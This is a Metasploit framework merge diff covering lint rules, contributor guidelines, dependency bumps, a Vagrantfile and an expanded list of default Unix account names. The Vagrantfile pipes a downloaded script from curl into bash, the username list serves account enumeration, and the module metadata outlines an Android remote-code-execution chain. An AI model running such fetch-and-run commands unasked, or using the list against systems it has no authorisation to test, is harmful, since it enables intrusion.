Land #13037 , Add tips on msfconsole startup

Add useful tips when starting up metasploit
Land #13055 , rollback simplecov version due to error
2020-03-11 13:59:57 +00:00 · 2020-03-11 10:18:42 +00:00 · 2020-03-10 19:09:48 -05:00 · 2020-03-10 14:59:12 -05:00 · 2020-03-10 15:32:15 -04:00 · 2020-03-10 13:08:49 +00:00
392 changed files with 14066 additions and 3529 deletions
@@ -11,6 +11,16 @@
 AllCops:
  TargetRubyVersion: 2.4

+require:
+  - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
+  - ./lib/rubocop/cop/layout/module_description_indentation.rb
+
+Layout/ModuleHashOnNewLine:
+  Enabled: true
+
+Layout/ModuleDescriptionIndentation:
+  Enabled: true
+
 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
@@ -59,6 +69,25 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

+Layout/FirstArgumentIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/ArgumentAlignment:
+  Enabled: true
+  EnforcedStyle: with_first_argument
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/FirstHashElementIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/FirstHashElementLineBreak:
+  Enabled: true
+  Description: 'Enforce consistency by breaking hash elements on to new lines'
+
 Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
  Description: 'Almost all module metadata have space in brackets'
@@ -93,26 +122,26 @@ Style/TrailingCommaInArrayLiteral:

 Metrics/LineLength:
  Description: >-
-                  Metasploit modules often pattern match against very
-                  long strings when identifying targets.
+    Metasploit modules often pattern match against very
+    long strings when identifying targets.
  Enabled: true
  Max: 180

 Metrics/BlockLength:
  Enabled: true
  Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
+    While the style guide suggests 10 lines, exploit definitions
+    often exceed 200 lines.
  Max: 300

 Metrics/MethodLength:
  Enabled: true
  Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
+    While the style guide suggests 10 lines, exploit definitions
+    often exceed 200 lines.
  Max: 300

-Naming/MethodParameterName:            
+Naming/MethodParameterName:
  Enabled: true
  Description: 'Whoever made this requirement never looked at crypto methods, IV'
  MinNameLength: 2
@@ -126,13 +155,10 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Layout/HashAlignment:
-  Enabled: false
-  Description: 'aligning info hashes to match these rules is almost impossible to get right'
-
-Layout/EmptyLines:
-  Enabled: false
-  Description: 'these are used to increase readability'
+Layout/FirstArrayElementIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful to force values within the register_options array to have sane indentation'

 Layout/EmptyLinesAroundClassBody:
  Enabled: false
@@ -142,19 +168,24 @@ Layout/EmptyLinesAroundMethodBody:
  Enabled: false
  Description: 'these are used to increase readability'

-Layout/ParameterAlignment:
+Layout/ExtraSpacing:
+  Description: 'Do not use unnecessary spacing.'
  Enabled: true
-  EnforcedStyle: 'with_fixed_indentation'
-  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
+  # When true, allows most uses of extra spacing if the intent is to align
+  # things with the previous or next line, not counting empty lines or comment
+  # lines.
+  AllowForAlignment: false
+  # When true, allows things like 'obj.meth(arg)  # comment',
+  # rather than insisting on 'obj.meth(arg) # comment'.
+  # If done for alignment, either this OR AllowForAlignment will allow it.
+  AllowBeforeTrailingComments: false
+  # When true, forces the alignment of `=` in assignments on consecutive lines.
+  ForceEqualSignAlignment: false

 Style/For:
  Enabled: false
  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'

-Style/StringLiterals:
-  Enabled: false
-  Description: 'Single vs double quote fights are largely unproductive.'
-
 Style/WordArray:
  Enabled: false
  Description: 'Metasploit prefers consistent use of []'
@@ -163,6 +194,22 @@ Style/IfUnlessModifier:
  Enabled: false
  Description: 'This style might save a couple of lines, but often makes code less clear'

+Style/PercentLiteralDelimiters:
+  Description: 'Use `%`-literal delimiters consistently.'
+  Enabled: true
+  # Specify the default preferred delimiter for all types with the 'default' key
+  # Override individual delimiters (even with default specified) by specifying
+  # an individual key
+  PreferredDelimiters:
+    default: ()
+    '%i': '[]'
+    '%I': '[]'
+    '%r': '{}'
+    '%w': '[]'
+    '%W': '[]'
+    '%q': '{}' # Chosen for module descriptions as () are frequently used characters, whilst {} are rarely used
+  VersionChanged: '0.48.1'
+
 Style/RedundantBegin:
  Exclude:
    # this pattern is very common and somewhat unavoidable
@@ -1,64 +1,66 @@
-# Hello, World!
-
-Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, review our
-[Code of Conduct].  There are multiple ways to help beyond just writing code:
- - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recently submitted pull requests].
- - [Report a security vulnerability in Metasploit itself] to Rapid7.
- - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
-   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
-
 # Contributing to Metasploit
+Thank you for your interest in making Metasploit -- and therefore, the
+world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved. 
+
+## Code Free Contributions 
+Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+
+ - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea: 
+ 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
+ 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
+ - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed! 
+ - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality. 
+ - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!  
+ - [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 

-Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
-it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
-**will** be closed. Sorry!

 ## Code Contributions
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.

-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.  
+
+Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
+will be closed. We need to ensure the code we're adding to master is written to a high standard.
+
+
+### Code Contribution Do's & Don'ts:
+--
+#### <u>Pull Requests</u>
+**Pull request [PR#9966] is a good example to follow.**
+
+* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
+	*  Protect the process.
+	* Ensures users are aware of commits on the branch being considered for merge.  
+	* Allows for a location for more commits to be offered without mingling with other contributor changes.
+	* Allows contributors to make progress while a PR is still being reviewed.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
-  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
-  allows for a location for more commits to be offered without mingling with other contributor changes,
-  and allows contributors to make progress while a PR is still being reviewed.
-
-
-### Pull Requests
-
 * **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for witnessable effects in `msfconsole`.
+* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 * **Don't** post questions in older closed PRs.

-Pull request [PR#9966] is a good example to follow.
-
-#### New Modules
-
+#### <u>New Modules</u>
+* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
 * **Do** use the many module mixin [API]s.
-* **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
 * **Do** include [Module Documentation] showing sample run-throughs.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
-  anything "serious" can be done with post modules and local exploits.
-
-#### Library Code
+* **Don't** include more than one module per pull request.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.

+#### <u>Library Code</u>
 * **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.

-#### Bug Fixes
-
+#### <u>Bug Fixes</u>
 * **Do** include reproduction steps in the form of verification steps.
 * **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.

@@ -99,8 +101,8 @@ curve, so keep it up!
 [Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
-[Better Specs]:http://betterspecs.org
+[Better Specs]:http://www.betterspecs.org/
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
@@ -8,7 +8,7 @@ gem 'sqlite3', '~>1.3.0'
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
-  gem 'simplecov'
+  gem 'simplecov', '0.18.2'
 end

 group :development do
@@ -17,7 +17,7 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  gem 'pry'
+  gem 'pry-byebug'
  # module documentation
  gem 'octokit'
  # Metasploit::Aggregator external session proxy
@@ -36,6 +36,7 @@ group :development, :test do
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
+  gem 'rubocop'
  gem 'swagger-blocks'
 end

@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.72)
+    metasploit-framework (5.0.80)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -20,15 +20,16 @@ PATH
      faraday (<= 0.17.0)
      faye-websocket
      filesize
+      hrr_rb_ssh (= 0.3.0.pre2)
      jsobfu
      json
      metasm
      metasploit-concern (~> 2.0.0)
      metasploit-credential (~> 3.0.0)
      metasploit-model (~> 2.0.4)
-      metasploit-payloads (= 1.3.84)
+      metasploit-payloads (= 1.3.86)
      metasploit_data_models (~> 3.0.10)
-      metasploit_payloads-mettle (= 0.5.16)
+      metasploit_payloads-mettle (= 0.5.19)
      mqtt
      msgpack
      nessus_rest
@@ -116,33 +117,35 @@ GEM
    arel (6.0.4)
    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
+    ast (2.4.0)
    aws-eventstream (1.0.3)
-    aws-partitions (1.267.0)
-    aws-sdk-core (3.89.1)
+    aws-partitions (1.279.0)
+    aws-sdk-core (3.90.1)
      aws-eventstream (~> 1.0, >= 1.0.2)
      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.137.0)
+    aws-sdk-ec2 (1.146.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.32.0)
+    aws-sdk-iam (1.33.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.28.0)
+    aws-sdk-kms (1.29.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.60.1)
+    aws-sdk-s3 (1.60.2)
      aws-sdk-core (~> 3, >= 3.83.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.1.0)
+    aws-sigv4 (1.1.1)
      aws-eventstream (~> 1.0, >= 1.0.2)
    bcrypt (3.1.12)
    bcrypt_pbkdf (1.0.1)
-    bindata (2.4.4)
+    bindata (2.4.6)
    bit-struct (0.16)
    builder (3.2.4)
+    byebug (11.1.1)
    coderay (1.1.2)
    concurrent-ruby (1.0.5)
    cookiejar (0.3.3)
@@ -178,9 +181,12 @@ GEM
    filesize (0.2.0)
    fivemat (1.3.7)
    hashery (2.1.2)
+    hrr_rb_ssh (0.3.0.pre2)
+      ed25519 (~> 1.2)
    http_parser.rb (0.6.0)
    i18n (0.9.5)
      concurrent-ruby (~> 1.0)
+    jaro_winkler (1.5.4)
    jmespath (1.4.0)
    jsobfu (0.4.2)
      rkelly-remix
@@ -207,7 +213,7 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.84)
+    metasploit-payloads (1.3.86)
    metasploit_data_models (3.0.10)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -218,26 +224,29 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.16)
+    metasploit_payloads-mettle (0.5.19)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
    minitest (5.14.0)
    mqtt (0.5.0)
-    msgpack (1.3.1)
+    msgpack (1.3.3)
    multipart-post (2.1.1)
    nessus_rest (0.1.6)
    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.7)
+    nokogiri (1.10.9)
      mini_portile2 (~> 2.4.0)
-    octokit (4.15.0)
+    octokit (4.16.0)
      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
+    parallel (1.19.1)
+    parser (2.7.0.2)
+      ast (~> 2.4.0)
    patch_finder (1.0.2)
    pcaprub (0.13.0)
    pdf-reader (2.4.0)
@@ -255,8 +264,11 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
+    pry-byebug (3.8.0)
+      byebug (~> 11.0)
+      pry (~> 0.10)
    public_suffix (4.0.3)
-    rack (1.6.12)
+    rack (1.6.13)
    rack-protection (1.5.5)
      rack
    rack-test (0.6.3)
@@ -274,9 +286,10 @@ GEM
      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
+    rainbow (3.0.0)
    rake (13.0.1)
    rb-readline (0.5.5)
-    recog (2.3.6)
+    recog (2.3.7)
      nokogiri
    redcarpet (3.5.0)
    rex-arch (0.1.13)
@@ -305,9 +318,10 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.84)
+    rex-powershell (0.1.87)
      rex-random_identifier
      rex-text
+      ruby-rc4
    rex-random_identifier (0.1.4)
      rex-text
    rex-registry (0.1.3)
@@ -315,7 +329,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.21)
+    rex-socket (0.1.22)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
@@ -325,6 +339,7 @@ GEM
    rex-text (0.2.24)
    rex-zip (0.1.3)
      rex-text
+    rexml (3.2.4)
    rkelly-remix (0.0.7)
    rspec (3.9.0)
      rspec-core (~> 3.9.0)
@@ -349,22 +364,30 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.9.2)
+    rubocop (0.80.0)
+      jaro_winkler (~> 1.5.1)
+      parallel (~> 1.10)
+      parser (>= 2.7.0.1)
+      rainbow (>= 2.2.2, < 4.0)
+      rexml
+      ruby-progressbar (~> 1.7)
+      unicode-display_width (>= 1.4.0, < 1.7)
    ruby-macho (2.2.0)
+    ruby-progressbar (1.10.1)
    ruby-rc4 (0.1.5)
    ruby_smb (1.1.0)
      bindata
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (2.0.0)
+    rubyzip (2.2.0)
    sawyer (0.8.2)
      addressable (>= 2.3.5)
      faraday (> 0.8, < 2.0)
-    simplecov (0.17.1)
+    simplecov (0.18.2)
      docile (~> 1.1)
-      json (>= 1.8, < 3)
-      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.2)
+      simplecov-html (~> 0.11)
+    simplecov-html (0.12.2)
    sinatra (1.4.8)
      rack (~> 1.5)
      rack-protection (~> 1.4)
@@ -380,11 +403,12 @@ GEM
    thread_safe (0.3.6)
    tilt (2.0.10)
    timecop (0.9.1)
-    ttfunk (1.6.1)
+    ttfunk (1.6.2.1)
    tzinfo (1.2.6)
      thread_safe (~> 0.1)
    tzinfo-data (1.2019.3)
      tzinfo (>= 1.0.0)
+    unicode-display_width (1.6.1)
    warden (1.2.7)
      rack (>= 1.0)
    websocket-driver (0.7.1)
@@ -405,12 +429,13 @@ DEPENDENCIES
  fivemat
  metasploit-framework!
  octokit
-  pry
+  pry-byebug
  rake
  redcarpet
  rspec-rails
  rspec-rerun
-  simplecov
+  rubocop
+  simplecov (= 0.18.2)
  sqlite3 (~> 1.3.0)
  swagger-blocks
  timecop
@@ -71,6 +71,10 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

+Files: lib/expect.rb
+Copyright: 2017 Yukihiro Matsumoto
+License: Ruby
+
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0
@@ -10,32 +10,33 @@ afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.11.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.267.0, "Apache 2.0"
-aws-sdk-core, 3.89.1, "Apache 2.0"
-aws-sdk-ec2, 1.137.0, "Apache 2.0"
-aws-sdk-iam, 1.32.0, "Apache 2.0"
-aws-sdk-kms, 1.28.0, "Apache 2.0"
-aws-sdk-s3, 1.60.1, "Apache 2.0"
-aws-sigv4, 1.1.0, "Apache 2.0"
+aws-partitions, 1.279.0, "Apache 2.0"
+aws-sdk-core, 3.90.1, "Apache 2.0"
+aws-sdk-ec2, 1.146.0, "Apache 2.0"
+aws-sdk-iam, 1.33.0, "Apache 2.0"
+aws-sdk-kms, 1.29.0, "Apache 2.0"
+aws-sdk-s3, 1.60.2, "Apache 2.0"
+aws-sigv4, 1.1.1, "Apache 2.0"
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
-bindata, 2.4.4, ruby
+bindata, 2.4.6, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
+byebug, 11.1.1, "Simplified BSD"
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
-diff-lcs, 1.3, "Artistic-2.0, GPL-2.0+, MIT"
+diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.3, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
 em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
-eventmachine, 1.2.7, "GPL-2.0, ruby"
+eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 5.1.1, MIT
 factory_bot_rails, 5.1.1, MIT
 faker, 2.2.1, MIT
@@ -44,6 +45,7 @@ faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
+hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
 http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
 jmespath, 1.4.0, "Apache 2.0"
@@ -53,23 +55,23 @@ loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.72, "New BSD"
+metasploit-framework, 5.0.80, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.85, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
-metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 0.5.19, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.3.1, "Apache 2.0"
+msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.7, MIT
-octokit, 4.15.0, MIT
+nokogiri, 1.10.9, MIT
+octokit, 4.16.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
@@ -80,8 +82,9 @@ pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
+pry-byebug, 3.8.0, MIT
 public_suffix, 4.0.3, MIT
-rack, 1.6.12, MIT
+rack, 1.6.13, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
@@ -90,7 +93,7 @@ rails-html-sanitizer, 1.3.0, MIT
 railties, 4.2.11.1, MIT
 rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.6, unknown
+recog, 2.3.7, unknown
 redcarpet, 3.5.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
@@ -101,11 +104,11 @@ rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.84, "New BSD"
+rex-powershell, 0.1.87, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.21, "New BSD"
+rex-socket, 0.1.22, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.24, "New BSD"
@@ -122,10 +125,10 @@ ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 2.0.0, "Simplified BSD"
+rubyzip, 2.2.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.17.1, MIT
-simplecov-html, 0.10.2, MIT
+simplecov, 0.18.5, MIT
+simplecov-html, 0.12.2, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
@@ -135,7 +138,7 @@ thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.6.1, "GPL-2.0, GPL-3.0, Nonstandard"
+ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.6, MIT
 tzinfo-data, 1.2019.3, MIT
 warden, 1.2.7, MIT
@@ -28,7 +28,7 @@ Vagrant.configure(2) do |config|
    config.vm.provision "shell", inline: step
  end

-  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
+  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
@@ -1,88 +1,131 @@

 4Dgifts
-EZsetup
-OutOfBox
-ROOT
+abrt
 adm
 admin
 administrator
 anon
+_apt
+arpwatch
 auditor
 avahi
 avahi-autoipd
 backup
 bbs
+beef-xss
 bin
+bitnami
 checkfs
 checkfsys
 checksys
 chronos
+chrony
 cmwlogin
+cockpit-ws
+colord
 couchdb
+cups-pk-helper
 daemon
 dbadmin
+dbus
+Debian-exim
+Debian-snmp
 demo
 demos
 diag
 distccd
 dni
+dnsmasq
+dradis
+EZsetup
 fal
 fax
 ftp
 games
 gdm
+geoclue
 gnats
+gnome-initial-setup
 gopher
 gropher
 guest
 haldaemon
 halt
 hplip
+inetsim
 informix
 install
+iodine
 irc
+jet
 karaf
 kernoops
+king-phisher
+landscape
+libstoragemgmt
 libuuid
+lightdm
 list
 listen
 lp
 lpadm
 lpadmin
+lxd
 lynx
 mail
 man
 me
 messagebus
+miredo
 mountfs
 mountfsys
 mountsys
+mysql
 news
 noaccess
 nobody
 nobody4
+ntp
 nuucp
+nxautomation
 nxpgsql
+omi
+omsagent
 operator
 oracle
+OutOfBox
 pi
+polkitd
+pollinate
 popr
+postfix
 postgres
 postmaster
 printer
 proxy
 pulse
+redsocks
 rfindd
 rje
 root
+ROOT
 rooty
+rpc
+rpcuser
+rtkit
+rwhod
 saned
 service
+setroubleshoot
 setup
 sgiweb
+shutdown
 sigver
 speech-dispatcher
 sshd
+sslh
+sssd
+stunnel4
 sym
 symop
 sync
@@ -92,22 +135,34 @@ sysadmin
 sysbin
 syslog
 system_admin
+systemd-bus-proxy
+systemd-coredump
+systemd-network
+systemd-resolve
+systemd-timesync
+tcpdump
 trouble
+tss
 udadmin
 ultra
 umountfs
 umountfsys
 umountsys
 unix
+unscd
 us_admin
+usbmux
 user
 uucp
 uucpadm
+uuidd
+vagrant
+varnish
 web
 webmaster
+whoopsie
 www
 www-data
 xpdb
 xpopr
 zabbix
-vagrant
@@ -64,7 +64,7 @@
    ],
    "description": "This module combines two vulnerabilities to achieve remote code\n        execution on affected Android devices. First, the module exploits\n        CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n        versions of Android's open source stock browser (the AOSP Browser) prior to\n        4.4. Second, the Google Play store's web interface fails to enforce a\n        X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n        targeted for script injection. As a result, this leads to remote code execution\n        through Google Play's remote installation feature, as any application available\n        on the Google Play store can be installed and launched on the user's device.\n\n        This module requires that the user is logged into Google with a vulnerable browser.\n\n        To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041",
+      "URL-https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041",
      "URL-http://1337day.com/exploit/description/22581",
      "OSVDB-110664",
      "CVE-2014-6041"
@@ -79,7 +79,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb",
    "is_install_path": true,
    "ref_name": "admin/android/google_play_store_uxss_xframe_rce",
@@ -198,7 +198,7 @@
    ],
    "description": "This module acts as a simplistic administrative client for interfacing\n        with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n        the TLS-250 and TLS-350 protocols.  This has been tested against\n        GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n        been tested against anything else, so use at your own risk.",
    "references": [
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/01/22/the-internet-of-gas-station-tank-gauges",
+      "URL-https://blog.rapid7.com/2015/01/22/the-internet-of-gas-station-tank-gauges",
